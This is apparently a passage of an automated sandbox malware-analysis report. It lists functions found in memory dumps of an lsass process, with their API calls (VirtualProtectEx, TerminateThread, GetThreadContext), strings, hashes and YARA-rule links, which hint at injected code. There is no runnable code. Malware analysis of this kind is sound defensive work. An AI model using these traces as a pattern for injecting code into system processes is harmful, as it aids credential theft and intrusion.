_RTC_Initialize.LIBCMT ref: 00000140AE8675B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000140AE8675DE
__scrt_release_startup_lock.LIBCMT ref: 00000140AE867609

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: 65cc65eb12478eed7e59dbe5af20ea895e9a9811b6e8982f7201964f625eb0cd
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: F2819F30A9034187FB53AB6798413D92292AB8D7B4F744525AF0C477B6EB3ACC45C7C2

Function 00000140AE869DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00000140AE869E49
GetLastError.KERNEL32 ref: 00000140AE869E57
LoadLibraryExW.KERNEL32 ref: 00000140AE869E81
FreeLibrary.KERNEL32 ref: 00000140AE869EC7
GetProcAddress.KERNEL32 ref: 00000140AE869ED3

Strings

api-ms-, xrefs: 00000140AE869E69

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction ID: 03dcf4635245ae701bcfc235362316d2ff68836874f11cf0347ec2092aff8e99
Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction Fuzzy Hash: 9F319031292B40E1EF239B47A4007D56394B74CBB0F7985259E2E4B7A0EF7DC845C392

Function 00000140AE873DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00000140AE873DE5
GetLastError.KERNEL32 ref: 00000140AE873DF1
CloseHandle.KERNEL32 ref: 00000140AE873E09
CreateFileW.KERNEL32 ref: 00000140AE873E34
WriteConsoleW.KERNEL32 ref: 00000140AE873E53

Strings

CONOUT$, xrefs: 00000140AE873E15

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction ID: ad989254367ffea67bb77bf17bba7392694ea205673c5da45a75a0c92e4d569a
Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction Fuzzy Hash: 82114932650B4086E7528B53A84439977A4B79CFF4F644224EF5E87BA5CF38C814C782

Function 00000140AE863790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000140AE86379E
GetCurrentProcess.KERNEL32 ref: 00000140AE8637CC
VirtualProtectEx.KERNEL32 ref: 00000140AE8637EE
GetCurrentProcess.KERNEL32 ref: 00000140AE863809
VirtualProtectEx.KERNEL32 ref: 00000140AE86382A

Strings

wr, xrefs: 00000140AE8637FF

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID: wr
API String ID: 1092925422-2678910430
Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction ID: fd890a10e18ff91e2345af510b04503e6d001258bbebb589a967ba1f92d71b91
Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction Fuzzy Hash: 81113936B45B8182FF159B23E4082A972A0FB8CBA5F640029DF9D077A4EF3DC905C745

Function 00000140AE865B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000140AE865B6B
GetThreadContext.KERNEL32 ref: 00000140AE865CD5

Part of subcall function 00000140AE865960: GetCurrentThreadId.KERNEL32 ref: 00000140AE865964

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
Instruction ID: 4b8643210702c91202cb0783c5a391a2a26d50b369a2e2f855514301358eef3e
Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
Instruction Fuzzy Hash: 98D19736248B8882DA719B0AE49439A77A0F78CB94F600516EF8D47BB5DF3CC941CB81

Function 00000140AE862F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000140AE862F27
HeapAlloc.KERNEL32 ref: 00000140AE862F3A
StrCmpNIW.SHLWAPI ref: 00000140AE862FAF
GetProcessHeap.KERNEL32 ref: 00000140AE863015
HeapFree.KERNEL32 ref: 00000140AE863023

Strings

dialer, xrefs: 00000140AE862FA8

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction ID: a2d052cb6962f498e3cef9ed57c0a8daa6a62b61da821da8834fd8d960af75c0
Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction Fuzzy Hash: D231B332741B5182EB26DF1BE5447A9A7A0FB4DBA4F2881209F4C47B75EF34C8A5C781

Function 00000140AE86CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00000140AE86CFAF
FlsSetValue.KERNEL32(?,?,?,00000140AE86D6B5,?,?,?,?,00000140AE86D778), ref: 00000140AE86CFE5
FlsSetValue.KERNEL32(?,?,?,00000140AE86D6B5,?,?,?,?,00000140AE86D778), ref: 00000140AE86D012
FlsSetValue.KERNEL32(?,?,?,00000140AE86D6B5,?,?,?,?,00000140AE86D778), ref: 00000140AE86D023
FlsSetValue.KERNEL32(?,?,?,00000140AE86D6B5,?,?,?,?,00000140AE86D778), ref: 00000140AE86D034
SetLastError.KERNEL32 ref: 00000140AE86D04F

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction ID: b1e378f208745640ce80b78c559ffaa0a20b0e3a8eff5e4311b7b060cf634d78
Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction Fuzzy Hash: F3112E3028534081FA66AB635A553A962416B9C7F4F344B24EE3E476FADE78DC01D6C3

Function 00000140AE86199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000140AE8619C2
K32GetModuleFileNameExW.KERNEL32 ref: 00000140AE8619E0
PathFindFileNameW.SHLWAPI ref: 00000140AE8619EF
lstrlenW.KERNEL32 ref: 00000140AE8619FB
StrCpyW.SHLWAPI ref: 00000140AE861A0E
CloseHandle.KERNEL32 ref: 00000140AE861A1C

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction ID: 9022e9ca5b0b5f71c7b82a84b25e46de0569a46428ab685b711a92cff19137a4
Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction Fuzzy Hash: A5015731740B4082EB51DB53A848799A3A1F78CBD1FA84035DF4D43B65DE38C989C781

Function 00000140AE8636C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000140AE8636E4
GetCurrentProcess.KERNEL32 ref: 00000140AE8636F2
VirtualProtectEx.KERNEL32 ref: 00000140AE863714
GetCurrentProcess.KERNEL32 ref: 00000140AE863732
VirtualProtectEx.KERNEL32 ref: 00000140AE863753
TerminateThread.KERNEL32 ref: 00000140AE863762

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
Instruction ID: 301de5e6a3bc59086d6f9150b82df67b6d6c22bbab0207dc7c03168e1951e1a1
Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
Instruction Fuzzy Hash: 01015774651B40C2EB269B23E81879973A0BB9DBA2F240428CF4D07774EF3CC908C782

Function 00000140AE868FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000140AE869013
_IsNonwritableInCurrentImage.LIBCMT ref: 00000140AE8690A8
RtlUnwindEx.NTDLL ref: 00000140AE8690F7

Strings

csm, xrefs: 00000140AE86908E
f, xrefs: 00000140AE869026

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
Instruction ID: bd338bf40550659d0ab490f789d63c081b601061abea68a920c6aca0165ba548
Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
Instruction Fuzzy Hash: 8351A13265170086EB16CB16E848B9937A6F348BA8F318524DF1A477E8DB3DCC41C782

Function 00000140AE863044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 00000140AE863066
StrCpyW.SHLWAPI ref: 00000140AE863076
StrCatW.SHLWAPI ref: 00000140AE863082
PathCombineW.SHLWAPI ref: 00000140AE863090

Strings

\\.\pipe\, xrefs: 00000140AE86305C

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction ID: 0e89825c8f5d70b27a483a01b8d98a85527b4973c2a0efa788cb30948269fb2a
Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction Fuzzy Hash: A6F05E30644B8082EB058B53B9041996261AB8CFE0F245020EF4E07B78DE38C849C782

Function 00000140AE86BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00000140AE86BCBD
GetProcAddress.KERNEL32 ref: 00000140AE86BCD3
FreeLibrary.KERNEL32 ref: 00000140AE86BCFA

Strings

CorExitProcess, xrefs: 00000140AE86BCCC
mscoree.dll, xrefs: 00000140AE86BCB4

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction ID: 0a5f03d881548423950f550b58b8fc74d35f60bbb561fa5f685fc2d061d5bb49
Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction Fuzzy Hash: 7EF06D71655B0582EB128B26E8443A97320EB8CBB5F740219CF6E472F4CF3DC948D381

Function 00000140AE8650D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000140AE865156

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
Instruction ID: 73fda85837acdd30ad006dc6ccb1667200e15de9212539d4e27f8f5c03466d3a
Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
Instruction Fuzzy Hash: 2702FA32259B8486EB61DB56F49439AB7A1F7C8794F200415EB8E87BB8DF7CC844CB41

Function 00000140AE865710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000140AE865726

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
Instruction ID: 819f4eb226d638b22eb9453569fbd0dff2ed878ae5cb7d9cc285f1354ad887c7
Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
Instruction Fuzzy Hash: 9B61C536559B44C6E7629B16F48439AB7A0F7887A4F600515EF8E47BB8DF7CC840CB82

Function 00000140AE874104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000140AE87412C
_set_statfp.LIBCMT ref: 00000140AE874147
_set_statfp.LIBCMT ref: 00000140AE874163
_set_statfp.LIBCMT ref: 00000140AE87419F

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: 28d524a13795f3523b3f1b4b207150eb2f338f5cab7179f9a4c1ef00b7941454
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: DC119132AD0B5011F667256AD4913E531446B6DBB8F390624AF7E176F68B34CC41C2A2

Function 00000140ADFD3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000140ADFD352C
_set_statfp.LIBCMT ref: 00000140ADFD3547
_set_statfp.LIBCMT ref: 00000140ADFD3563
_set_statfp.LIBCMT ref: 00000140ADFD359F

Memory Dump Source

Source File: 00000044.00000002.3352596228.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140adfc0000_lsass.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: 2e1910b8291bafd17102f3214c72d3e729590e13e78c3872cab4fc5f060f1e3e
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: 22115472614B5353FA56162AE4553EB31C36F5C37CF784628AFE6076F68A34E8436200

Function 00000140ADFCF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000140ADFCF124

Strings

Tuesday, xrefs: 00000140ADFCF0F4
Wednesday, xrefs: 00000140ADFCF1ED
or copy constructor iterator', xrefs: 00000140ADFCF25A, 00000140ADFCF275

Memory Dump Source

Source File: 00000044.00000002.3352596228.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140adfc0000_lsass.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: Tuesday$Wednesday$or copy constructor iterator'
API String ID: 3215553584-4202648911
Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction ID: 48ac8b7a938d00f4a24374fee49c64dd94bfb0dfea2bd827f35d3ab40a9a7452
Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction Fuzzy Hash: 3961B43652234853FA6B8B67E5443EBBAA3EF8D748F744415CB46077B4DB34C967A200

Function 00000140AE86AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00000140AE86AA68
_CallSETranslator.LIBVCRUNTIME ref: 00000140AE86AAB7

Strings

RCC, xrefs: 00000140AE86AA85
MOC, xrefs: 00000140AE86AA7C

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: 1c54ac8669fca167ed3fb4a5461af2b1e7039b1515757cf07daf6e620200d245
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: B6619F33640B848AEB11DF66D4403DD77A0F748BA8F244256EF4E17BA9DB38C995C781

Function 00000140AE86AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000140AE86ADA0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00000140AE86AE88

Strings

csm, xrefs: 00000140AE86ADC2
csm, xrefs: 00000140AE86AEDA

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: 6cac39d5d8876cbc65fde025732dcd94be71c236f1742025846821184820e854
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: D951AF72180780CAEB768F17958439977A0F358BA8F244256DF9D47BE5CB38D890D782

Function 00000140ADFCA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000140ADFCA1A0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00000140ADFCA288

Strings

csm, xrefs: 00000140ADFCA1C2
csm, xrefs: 00000140ADFCA2DA

Memory Dump Source

Source File: 00000044.00000002.3352596228.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140adfc0000_lsass.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: 5e9ed10956360af88f8a3a4b9cf73a15bede84b98f5d365089c0e3503e132e06
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: B751E432120388CBEB658B6794443DA37A3FB58B84F244117DB4947BE5CB39E5A2E700

Function 00000140ADFC8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000140ADFC8413
_IsNonwritableInCurrentImage.LIBCMT ref: 00000140ADFC84A8

Strings

csm, xrefs: 00000140ADFC848E
f, xrefs: 00000140ADFC8426

Memory Dump Source

Source File: 00000044.00000002.3352596228.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140adfc0000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction ID: 595c9e32b9df4e514150441d0aa3e925450171a8e5ef433ea7709e32150aded9
Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction Fuzzy Hash: E551E43272170487DB96CF16D404BEA3797FB48BA8F318424DB06437A8EBB4C952A704

Function 00000140ADFC83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000140ADFC8413
_IsNonwritableInCurrentImage.LIBCMT ref: 00000140ADFC84A8

Strings

csm, xrefs: 00000140ADFC848E
f, xrefs: 00000140ADFC8426

Memory Dump Source

Source File: 00000044.00000002.3352596228.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140adfc0000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction ID: fdcdef5ba31d8dbb8912a9a905e6b67567b4155f9952f6a6302e3e1a43461dee
Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction Fuzzy Hash: 4831CF3122174487E792DF13E844BDA37A7FB48B98F258414EF8A037A8CB38C952D704

Function 00000140AE872058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000140AE8720D7
WriteFile.KERNEL32 ref: 00000140AE87239F
WriteFile.KERNEL32 ref: 00000140AE8723E5
GetLastError.KERNEL32 ref: 00000140AE87249B

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
Instruction ID: 4b0a4d86e2932106c0371b6ae4a27eadaf1a36e0bf94906de29ca74a04e3cc8d
Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
Instruction Fuzzy Hash: 44D1D072B54B8089E712CFAAD5403EC3BB1F3587A8F244216CF5D97BA9DA34C946C381

Function 00000140AE8614A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000140AE8614C5
HeapFree.KERNEL32 ref: 00000140AE8614D4
GetProcessHeap.KERNEL32 ref: 00000140AE8614E1
HeapFree.KERNEL32 ref: 00000140AE8614F0
GetProcessHeap.KERNEL32 ref: 00000140AE861500

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
Instruction ID: e0938be913c4546f92e354b3f490316f5aad01bc8c73eed3b2a93003b4ccae50
Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
Instruction Fuzzy Hash: 4C015A32A40B90C6E706DF67E94828A77A1F78DFA1F244425EF4E4372ADE38C851C791

Function 00000140AE872980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32 ref: 00000140AE872A9C
GetLastError.KERNEL32 ref: 00000140AE872B27

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
Instruction ID: bfe30e0d5e1943aced18828ddcaefd42f41aed77c308e3009ff5d43c7c6b682c
Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
Instruction Fuzzy Hash: A491AFB264075085F762DF6A94803ED3BA4F758BA8F744109DF4E67AA5DB34CC82C782

Function 00000140AE867960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00000140AE86798C
GetCurrentThreadId.KERNEL32 ref: 00000140AE86799A
GetCurrentProcessId.KERNEL32 ref: 00000140AE8679A6
QueryPerformanceCounter.KERNEL32 ref: 00000140AE8679B6

Memory Dump Source

Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
